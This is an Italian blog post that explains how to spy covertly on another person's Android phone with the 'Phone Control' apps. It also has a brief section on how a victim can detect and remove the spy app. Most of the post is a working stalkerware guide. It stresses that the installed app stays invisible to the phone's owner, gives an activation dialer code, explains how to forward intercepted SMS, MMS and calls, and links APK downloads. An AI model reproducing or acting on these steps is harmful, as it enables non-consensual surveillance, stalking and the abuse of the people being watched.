Come spiare un cellulare Android con Phone Control e come proteggersi

0
59

ATTENZIONE: La guida che vi proponiamo oggi è solo una dimostrazione di come i nostri cellulari non siano sicuri e di come è facile controllare, spiare e tenere sotto controllo un cellulare android. A fine articolo troverete i link per i download ma anche la guida su come proteggerci. AGITE A VOSTRO RISCHIO E PERICOLO

Sorvegliare un cellulare Android

Le applicazioni di cui avremo bisogno sono 3 e sono le seguenti: Phone Control Admin, Phone Control Enabler e Phone Control key (PCK);. Le prime due vanno installate nel cellulare che vuole spiare, la terza, ovvero la Key va installata nel cellulare che deve essere spiato. L’applicazione che installarete sul cell da spiare NON SARÀ VISIBILE nelle applicazioni, quindi sarà possibile controllare tutto ciò che succede sullo smartphone sul quale è installata senza che quest’ultimo si accorga della vostra presenza.

Come funziona Phone Control?

Installate sul vostro cellulare Phone Control Admin e Phone Control Enabler, avviate prima quest’ultima in modo da attivare la parte admin.

Ora comincia il bello:

Avviate phone Control Admin e nella voce Phone Number inserite il numero di cellulare da spiare, ovviamente quello su cui avete installato Phone Control Key, compreso di prefisso internazionale:

es, +39320……

1

 

Ora per attivate tutte le opzioni dell’applicazione dovrete aprire il vostro dialer telefonico e telofanare a questo numero:

74283 (Questo è quello che dicono le guide inglesi, in realtà noi di AndroidABA abbiamo l’app completa semplicemente con i due file APK installati…).

 

Se sei interessato a prendere visione dei messaggi e delle chiamate, non ti resta che andare sul menu Forwards modes e selezionare le tue preferenze. Tutte le comunicazioni intercettate potranno essere ricevute sia via SMS sullo smatphone che tramite email direttamente su PC. Quest’ultima opzioni prevede l’inserimento dell’account di posta elettronica e della password.
Sempre dal menu principale delle impostazioni di Phone Control, accedi alla sezione SMS e MMS da cui scegliere l’opzione di invio automatico di SMS/MMS dallo smartphone intercettato verso quello spia. La medesima procedura vale per le chiamate (il menu specifico si chiama Phone calls). Un iter forse macchinoso ma che assicura risultati soddisfacenti in termini di dati conseguibili. Attenzione però agli addebiti sulla scheda sim. Ogni SMS spiato, quindi ricevuto sul proprio telefono, viene pagato come un qualsiasi altro messaggio inviato. Se la vostra tariffa prevede sms gratuiti allora non avrete problemi 😉

DOWNLOAD > Phone Control Admin

DOWNLOAD > Phone Control Enabler

DOWNLOAD > Phone Control Key (PCK)

Per scaricare i file attendete i 5 secondi previsti da adf.ly. Se sul vostro dispositivo avete installato progammi come adblock, adfree, adway e simili la pagina di adf.ly non sarà visualizzata e quindi non riuscirete a scaricare i file.

Come scoprire se il nostro cellulare è controllato

Se pensate che siate voi la vittima di questo metodo la soluzione è semplicissima: senza complicarvi la vita andate su questo link e scaricate la meravigliosa applicazione App Backup and Restore, avviatela e controllare se nel vostro cellulare è presente l’app PCK. Per vedere basta scorrere o semplicemente cercare PCK nel motore di ricerca. Se è presente selezionatela ed eliminatela come da foto.

Così facendo l’applicazione spia è stata eliminata e il vostro dispositivo non sarà più controllato!!! 😛

 

- Ads -

Rispondi